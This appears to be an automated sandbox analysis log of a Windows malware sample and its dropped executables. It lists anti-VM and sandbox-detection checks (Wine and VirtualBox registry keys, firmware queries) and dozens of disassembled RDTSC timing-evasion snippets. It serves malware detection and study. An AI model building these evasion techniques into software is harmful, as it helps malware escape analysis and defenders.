Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38C9F5 second address: 38C9F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38BBCE second address: 38BBDE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F856102FBE6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38BD00 second address: 38BD10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push ecx 0x00000008 jl 00007F856106A856h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38BD10 second address: 38BD15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38BFF6 second address: 38BFFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38BFFA second address: 38C00C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38EA42 second address: 20E9D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A868h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 10539002h 0x00000010 mov esi, dword ptr [ebp+122D36A0h] 0x00000016 push dword ptr [ebp+122D0931h] 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007F856106A858h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 0000001Dh 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 xor edi, 49785D2Fh 0x0000003c call dword ptr [ebp+122D3547h] 0x00000042 pushad 0x00000043 jc 00007F856106A862h 0x00000049 jg 00007F856106A85Ch 0x0000004f xor eax, eax 0x00000051 jnp 00007F856106A857h 0x00000057 cld 0x00000058 mov edx, dword ptr [esp+28h] 0x0000005c clc 0x0000005d mov dword ptr [ebp+122D36F8h], eax 0x00000063 mov dword ptr [ebp+122D1D2Ah], eax 0x00000069 mov esi, 0000003Ch 0x0000006e ja 00007F856106A857h 0x00000074 clc 0x00000075 add esi, dword ptr [esp+24h] 0x00000079 xor dword ptr [ebp+122D1D6Eh], ecx 0x0000007f lodsw 0x00000081 jmp 00007F856106A867h 0x00000086 add eax, dword ptr [esp+24h] 0x0000008a jmp 00007F856106A85Ah 0x0000008f mov ebx, dword ptr [esp+24h] 0x00000093 add dword ptr [ebp+122D1D2Ah], ecx 0x00000099 cmc 0x0000009a push eax 0x0000009b pushad 0x0000009c jl 00007F856106A85Ch 0x000000a2 push eax 0x000000a3 push edx 0x000000a4 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38EAD0 second address: 38EAFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F856102FBEBh 0x0000000b nop 0x0000000c mov dl, D9h 0x0000000e push 00000000h 0x00000010 adc edi, 733641EAh 0x00000016 push 634714D7h 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e jnp 00007F856102FBE6h 0x00000024 pop edi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38EAFB second address: 38EB00 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38EB00 second address: 38EB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 63471457h 0x0000000e and edi, dword ptr [ebp+122D36DCh] 0x00000014 mov esi, dword ptr [ebp+122D3858h] 0x0000001a push 00000003h 0x0000001c movsx ecx, cx 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 mov cl, 3Ch 0x00000024 pop edi 0x00000025 push 00000003h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F856102FBE8h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 0000001Bh 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 cmc 0x00000042 push 6072199Eh 0x00000047 push edi 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38EB55 second address: 38EB59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38EB59 second address: 38EB88 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F856102FBE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b add dword ptr [esp], 5F8DE662h 0x00000012 jmp 00007F856102FBEAh 0x00000017 lea ebx, dword ptr [ebp+12453935h] 0x0000001d sub dword ptr [ebp+122D29BDh], edi 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 push ecx 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 pop ecx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38EB88 second address: 38EBD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A861h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F856106A863h 0x00000011 jmp 00007F856106A85Bh 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007F856106A863h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38EEB7 second address: 38EED7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007F856102FBE6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F856102FBF1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38EED7 second address: 38EEF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F856106A866h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 385B11 second address: 385B3D instructions: 0x00000000 rdtsc 0x00000002 js 00007F856102FBE6h 0x00000008 jg 00007F856102FBE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 jmp 00007F856102FBF9h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 385B3D second address: 385B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 js 00007F856106A856h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AE118 second address: 3AE11D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AE3EF second address: 3AE3F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AE857 second address: 3AE86E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBEDh 0x00000007 jng 00007F856102FBE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AEAEF second address: 3AEB09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F856106A85Bh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F856106A856h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AEB09 second address: 3AEB0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AEC6E second address: 3AEC74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AEC74 second address: 3AEC7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AF1CE second address: 3AF1D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AF1D2 second address: 3AF1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AF1D8 second address: 3AF20C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F856106A85Ch 0x0000000c jmp 00007F856106A85Dh 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F856106A85Eh 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AF97D second address: 3AF983 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AF983 second address: 3AF99E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F856106A867h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3B00C0 second address: 3B00C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3B00C4 second address: 3B00C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3B236E second address: 3B2390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F856102FBEEh 0x0000000b jmp 00007F856102FBECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3B4C36 second address: 3B4C3C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3B540D second address: 3B5411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BCE41 second address: 3BCE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 380B18 second address: 380B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F856102FBF2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 380B2E second address: 380B3B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F856106A856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 380B3B second address: 380B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 380B45 second address: 380B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 380B51 second address: 380B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BC394 second address: 3BC39A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BC7AF second address: 3BC7CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F856102FBF4h 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BC7CA second address: 3BC7D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BC7D0 second address: 3BC7F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F856102FBF4h 0x0000000e je 00007F856102FBECh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BD4ED second address: 3BD4F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BD4F5 second address: 3BD4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BD5FA second address: 3BD5FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BD5FE second address: 3BD604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BD604 second address: 3BD60A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BD60A second address: 3BD60E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BD60E second address: 3BD61F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BD61F second address: 3BD623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BDA85 second address: 3BDA8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BDA8E second address: 3BDA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BE07B second address: 3BE07F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BE0F7 second address: 3BE116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F856102FBF5h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BE221 second address: 3BE227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BE227 second address: 3BE22B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BE22B second address: 3BE22F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BE34F second address: 3BE36B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F856102FBECh 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F856102FBE8h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BE447 second address: 3BE44D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BE44D second address: 3BE460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F856102FBE6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BE571 second address: 3BE584 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A85Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BEC2A second address: 3BEC85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F856102FBE8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov edi, 077BDF0Ch 0x0000002d push 00000000h 0x0000002f xchg eax, ebx 0x00000030 push ecx 0x00000031 push ebx 0x00000032 pushad 0x00000033 popad 0x00000034 pop ebx 0x00000035 pop ecx 0x00000036 push eax 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F856102FBEBh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BF6D0 second address: 3BF6DA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F856106A856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BF6DA second address: 3BF6E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BF553 second address: 3BF557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BF6E0 second address: 3BF6E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BF557 second address: 3BF55B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BF6E4 second address: 3BF6E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BF6E8 second address: 3BF719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c mov bl, 55h 0x0000000e mov edi, ebx 0x00000010 popad 0x00000011 push 00000000h 0x00000013 mov esi, 1D62357Fh 0x00000018 jnl 00007F856106A856h 0x0000001e push 00000000h 0x00000020 adc esi, 26CFC74Dh 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jng 00007F856106A858h 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BFEE2 second address: 3BFEED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F856102FBE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C0EDF second address: 3C0EE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C1BF0 second address: 3C1BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C321D second address: 3C3222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
